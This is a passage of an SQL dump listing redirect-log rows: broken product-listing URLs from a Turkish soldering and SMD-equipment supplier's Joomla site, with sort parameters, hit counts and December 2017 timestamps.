00:00:00',301),(17015,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',94,0,'2017-12-27 10:47:41','0000-00-00 00:00:00',301),(17016,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,ordering',NULL,'','',74,0,'2017-12-27 10:47:47','0000-00-00 00:00:00',301),(17017,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',92,0,'2017-12-27 10:47:58','0000-00-00 00:00:00',301),(17018,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',97,0,'2017-12-27 10:48:05','0000-00-00 00:00:00',301),(17019,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name',NULL,'','',87,0,'2017-12-27 10:48:10','0000-00-00 00:00:00',301),(17020,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',94,0,'2017-12-27 10:48:39','0000-00-00 00:00:00',301),(17021,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',95,0,'2017-12-27 10:48:47','0000-00-00 00:00:00',301),(17022,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_sku',NULL,'','',85,0,'2017-12-27 10:48:49','0000-00-00 00:00:00',301),(17023,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',87,0,'2017-12-27 10:49:03','0000-00-00 00:00:00',301),(17024,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/dirdesc',NULL,'','',84,0,'2017-12-27 10:49:10','0000-00-00 00:00:00',301),(17025,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',98,0,'2017-12-27 10:49:19','0000-00-00 00:00:00',301),(17026,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',93,0,'2017-12-27 10:49:25','0000-00-00 00:00:00',301),(17027,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',101,0,'2017-12-27 10:49:49','0000-00-00 00:00:00',301),(17028,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',98,0,'2017-12-27 10:50:08','0000-00-00 00:00:00',301),(17029,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku',NULL,'','',70,0,'2017-12-27 10:50:10','0000-00-00 00:00:00',301),(17030,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',69,0,'2017-12-27 10:50:24','0000-00-00 00:00:00',301),(17031,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',105,0,'2017-12-27 10:50:39','0000-00-00 00:00:00',301),(17032,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',112,0,'2017-12-27 10:50:45','0000-00-00 00:00:00',301),(17033,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,category_name',NULL,'','',78,0,'2017-12-27 10:50:57','0000-00-00 00:00:00',301),(17034,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',72,0,'2017-12-27 10:51:04','0000-00-00 00:00:00',301),(17035,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',116,0,'2017-12-27 10:51:16','0000-00-00 00:00:00',301),(17036,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',111,0,'2017-12-27 10:51:22','0000-00-00 00:00:00',301),(17037,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name',NULL,'','',80,0,'2017-12-27 10:51:40','0000-00-00 00:00:00',301),(17038,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',118,0,'2017-12-27 10:51:43','0000-00-00 00:00:00',301),(17039,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',71,0,'2017-12-27 10:51:47','0000-00-00 00:00:00',301),(17040,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',116,0,'2017-12-27 10:51:49','0000-00-00 00:00:00',301),(17041,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,ordering',NULL,'','',68,0,'2017-12-27 10:52:10','0000-00-00 00:00:00',301),(17042,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',123,0,'2017-12-27 10:52:11','0000-00-00 00:00:00',301),(17043,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',121,0,'2017-12-27 10:52:20','0000-00-00 00:00:00',301),(17044,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',130,0,'2017-12-27 10:52:36','0000-00-00 00:00:00',301),(17045,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_name',NULL,'','',93,0,'2017-12-27 10:52:43','0000-00-00 00:00:00',301),(17046,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',123,0,'2017-12-27 10:52:55','0000-00-00 00:00:00',301),(17047,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',73,0,'2017-12-27 10:52:55','0000-00-00 00:00:00',301),(17048,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',128,0,'2017-12-27 10:53:10','0000-00-00 00:00:00',301),(17049,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',132,0,'2017-12-27 10:53:42','0000-00-00 00:00:00',301),(17050,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_sku',NULL,'','',109,0,'2017-12-27 10:53:44','0000-00-00 00:00:00',301),(17051,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',137,0,'2017-12-27 10:53:46','0000-00-00 00:00:00',301),(17052,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',149,0,'2017-12-27 10:54:24','0000-00-00 00:00:00',301),(17053,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',155,0,'2017-12-27 10:54:28','0000-00-00 00:00:00',301),(17054,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',162,0,'2017-12-27 10:54:51','0000-00-00 00:00:00',301),(17055,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/dirdesc',NULL,'','',83,0,'2017-12-27 10:54:53','0000-00-00 00:00:00',301),(17056,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',161,0,'2017-12-27 10:55:05','0000-00-00 00:00:00',301),(17057,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',171,0,'2017-12-27 10:55:30','0000-00-00 00:00:00',301),(17058,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',190,0,'2017-12-27 10:55:41','0000-00-00 00:00:00',301),(17059,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',181,0,'2017-12-27 10:55:54','0000-00-00 00:00:00',301),(17060,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',198,0,'2017-12-27 10:56:17','0000-00-00 00:00:00',301),(17061,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',198,0,'2017-12-27 10:56:27','0000-00-00 00:00:00',301),(17062,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',203,0,'2017-12-27 10:56:53','0000-00-00 00:00:00',301),(17063,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',197,0,'2017-12-27 10:57:06','0000-00-00 00:00:00',301),(17064,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',214,0,'2017-12-27 10:57:25','0000-00-00 00:00:00',301),(17065,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',218,0,'2017-12-27 10:57:30','0000-00-00 00:00:00',301),(17066,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',212,0,'2017-12-27 11:00:27','0000-00-00 00:00:00',301),(17067,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',207,0,'2017-12-27 11:00:35','0000-00-00 00:00:00',301),(17068,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',215,0,'2017-12-27 11:01:24','0000-00-00 00:00:00',301),(17069,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',219,0,'2017-12-27 11:01:49','0000-00-00 00:00:00',301),(17070,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',216,0,'2017-12-27 11:01:57','0000-00-00 00:00:00',301),(17071,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',225,0,'2017-12-27 11:12:21','0000-00-00 00:00:00',301),(17072,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',225,0,'2017-12-27 11:15:46','0000-00-00 00:00:00',301),(17073,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',232,0,'2017-12-27 11:19:36','0000-00-00 00:00:00',301),(17074,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',231,0,'2017-12-27 11:19:44','0000-00-00 00:00:00',301),(17075,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',237,0,'2017-12-27 11:20:04','0000-00-00 00:00:00',301),(17076,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',238,0,'2017-12-27 11:20:05','0000-00-00 00:00:00',301),(17077,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',242,0,'2017-12-27 11:20:19','0000-00-00 00:00:00',301),(17078,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',240,0,'2017-12-27 11:20:34','0000-00-00 00:00:00',301),(17079,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',246,0,'2017-12-27 11:21:01','0000-00-00 00:00:00',301),(17080,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',244,0,'2017-12-27 11:21:08','0000-00-00 00:00:00',301),(17081,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',76,0,'2017-12-27 12:34:23','0000-00-00 00:00:00',301),(17082,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',76,0,'2017-12-27 12:34:24','0000-00-00 00:00:00',301),(17083,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name',NULL,'','',79,0,'2017-12-27 12:34:34','0000-00-00 00:00:00',301),(17084,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',79,0,'2017-12-27 12:34:36','0000-00-00 00:00:00',301),(17085,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name',NULL,'','',81,0,'2017-12-27 12:34:41','0000-00-00 00:00:00',301),(17086,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',82,0,'2017-12-27 12:34:43','0000-00-00 00:00:00',301),(17087,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,ordering',NULL,'','',85,0,'2017-12-27 12:34:48','0000-00-00 00:00:00',301),(17088,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_name',NULL,'','',81,0,'2017-12-27 12:34:51','0000-00-00 00:00:00',301),(17089,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',82,0,'2017-12-27 12:34:53','0000-00-00 00:00:00',301),(17090,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_sku',NULL,'','',83,0,'2017-12-27 12:34:57','0000-00-00 00:00:00',301),(17091,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/dirdesc',NULL,'','',83,0,'2017-12-27 12:35:00','0000-00-00 00:00:00',301),(17092,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',82,0,'2017-12-27 12:35:16','0000-00-00 00:00:00',301),(17093,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',82,0,'2017-12-27 12:35:17','0000-00-00 00:00:00',301),(17094,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',85,0,'2017-12-27 12:35:22','0000-00-00 00:00:00',301),(17095,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',82,0,'2017-12-27 12:35:23','0000-00-00 00:00:00',301),(17096,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',82,0,'2017-12-27 12:35:30','0000-00-00 00:00:00',301),(17097,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',83,0,'2017-12-27 12:35:31','0000-00-00 00:00:00',301),(17098,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',83,0,'2017-12-27 12:35:36','0000-00-00 00:00:00',301),(17099,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',83,0,'2017-12-27 12:35:39','0000-00-00 00:00:00',301),(17100,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',82,0,'2017-12-27 12:35:40','0000-00-00 00:00:00',301),(17101,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',82,0,'2017-12-27 12:35:45','0000-00-00 00:00:00',301),(17102,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',83,0,'2017-12-27 12:35:52','0000-00-00 00:00:00',301),(17103,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın',NULL,'','',79,0,'2017-12-27 12:36:03','0000-00-00 00:00:00',301),(17104,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',74,0,'2017-12-27 12:36:04','0000-00-00 00:00:00',301),(17105,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',74,0,'2017-12-27 12:36:06','0000-00-00 00:00:00',301),(17106,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',75,0,'2017-12-27 12:36:10','0000-00-00 00:00:00',301),(17107,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',77,0,'2017-12-27 12:36:12','0000-00-00 00:00:00',301),(17108,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',79,0,'2017-12-27 12:36:17','0000-00-00 00:00:00',301),(17109,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',79,0,'2017-12-27 12:36:18','0000-00-00 00:00:00',301),(17110,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',78,0,'2017-12-27 12:36:23','0000-00-00 00:00:00',301),(17111,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',73,0,'2017-12-27 12:36:25','0000-00-00 00:00:00',301),(17112,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',75,0,'2017-12-27 12:36:27','0000-00-00 00:00:00',301),(17113,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',75,0,'2017-12-27 12:36:32','0000-00-00 00:00:00',301),(17114,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',77,0,'2017-12-27 12:36:35','0000-00-00 00:00:00',301),(17115,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı',NULL,'','',77,0,'2017-12-27 12:36:39','0000-00-00 00:00:00',301),(17116,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',79,0,'2017-12-27 12:36:41','0000-00-00 00:00:00',301),(17117,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',80,0,'2017-12-27 12:36:42','0000-00-00 00:00:00',301),(17118,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',81,0,'2017-12-27 12:36:47','0000-00-00 00:00:00',301),(17119,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',78,0,'2017-12-27 12:36:49','0000-00-00 00:00:00',301),(17120,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',81,0,'2017-12-27 12:36:53','0000-00-00 00:00:00',301),(17121,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',80,0,'2017-12-27 12:36:55','0000-00-00 00:00:00',301),(17122,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',79,0,'2017-12-27 12:36:59','0000-00-00 00:00:00',301),(17123,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',78,0,'2017-12-27 12:37:03','0000-00-00 00:00:00',301),(17124,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',76,0,'2017-12-27 12:37:04','0000-00-00 00:00:00',301),(17125,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',76,0,'2017-12-27 12:37:09','0000-00-00 00:00:00',301),(17126,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',73,0,'2017-12-27 12:37:12','0000-00-00 00:00:00',301),(17127,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız',NULL,'','',79,0,'2017-12-27 12:37:17','0000-00-00 00:00:00',301),(17128,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',74,0,'2017-12-27 12:37:19','0000-00-00 00:00:00',301),(17129,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',73,0,'2017-12-27 12:37:20','0000-00-00 00:00:00',301),(17130,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',77,0,'2017-12-27 12:37:25','0000-00-00 00:00:00',301),(17131,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',76,0,'2017-12-27 12:37:26','0000-00-00 00:00:00',301),(17132,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',80,0,'2017-12-27 12:37:31','0000-00-00 00:00:00',301),(17133,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',84,0,'2017-12-27 12:37:33','0000-00-00 00:00:00',301),(17134,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',81,0,'2017-12-27 12:37:38','0000-00-00 00:00:00',301),(17135,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',80,0,'2017-12-27 12:37:41','0000-00-00 00:00:00',301),(17136,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',80,0,'2017-12-27 12:37:42','0000-00-00 00:00:00',301),(17137,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',82,0,'2017-12-27 12:37:47','0000-00-00 00:00:00',301),(17138,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',83,0,'2017-12-27 12:37:50','0000-00-00 00:00:00',301),(17139,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',80,0,'2017-12-27 12:37:55','0000-00-00 00:00:00',301),(17140,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',79,0,'2017-12-27 12:37:56','0000-00-00 00:00:00',301),(17141,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',81,0,'2017-12-27 12:37:58','0000-00-00 00:00:00',301),(17142,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',83,0,'2017-12-27 12:38:04','0000-00-00 00:00:00',301),(17143,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',83,0,'2017-12-27 12:38:07','0000-00-00 00:00:00',301),(17144,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',85,0,'2017-12-27 12:38:11','0000-00-00 00:00:00',301),(17145,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',82,0,'2017-12-27 12:38:13','0000-00-00 00:00:00',301),(17146,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',84,0,'2017-12-27 12:38:18','0000-00-00 00:00:00',301),(17147,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',81,0,'2017-12-27 12:38:21','0000-00-00 00:00:00',301),(17148,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',84,0,'2017-12-27 12:38:22','0000-00-00 00:00:00',301),(17149,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',81,0,'2017-12-27 12:38:27','0000-00-00 00:00:00',301),(17150,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',80,0,'2017-12-27 12:38:30','0000-00-00 00:00:00',301),(17151,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız',NULL,'','',76,0,'2017-12-27 12:38:35','0000-00-00 00:00:00',301),(17152,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-27 12:49:29','0000-00-00 00:00:00',301),(17153,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku',NULL,'','',86,0,'2017-12-27 14:05:13','0000-00-00 00:00:00',301),(17154,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',84,0,'2017-12-27 14:05:15','0000-00-00 00:00:00',301),(17155,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,category_name',NULL,'','',85,0,'2017-12-27 14:05:20','0000-00-00 00:00:00',301),(17156,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,category_name/dirdesc',NULL,'','',84,0,'2017-12-27 14:05:21','0000-00-00 00:00:00',301),(17157,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,mf_name',NULL,'','',86,0,'2017-12-27 14:05:26','0000-00-00 00:00:00',301),(17158,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',87,0,'2017-12-27 14:05:27','0000-00-00 00:00:00',301),(17159,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,ordering',NULL,'','',87,0,'2017-12-27 14:05:32','0000-00-00 00:00:00',301),(17160,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_name',NULL,'','',94,0,'2017-12-27 14:05:35','0000-00-00 00:00:00',301),(17161,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_name/dirdesc',NULL,'','',92,0,'2017-12-27 14:05:37','0000-00-00 00:00:00',301),(17162,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_sku',NULL,'','',93,0,'2017-12-27 14:05:42','0000-00-00 00:00:00',301),(17163,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/dirdesc',NULL,'','',91,0,'2017-12-27 14:05:44','0000-00-00 00:00:00',301),(17164,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',178,0,'2017-12-27 14:05:57','0000-00-00 00:00:00',301),(17165,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',179,0,'2017-12-27 14:06:00','0000-00-00 00:00:00',301),(17166,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',177,0,'2017-12-27 14:06:12','0000-00-00 00:00:00',301),(17167,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',179,0,'2017-12-27 14:06:41','0000-00-00 00:00:00',301),(17168,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,pc.ordering,product_name/dirdesc',NULL,'','',180,0,'2017-12-27 14:06:42','0000-00-00 00:00:00',301),(17169,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',173,0,'2017-12-27 14:07:57','0000-00-00 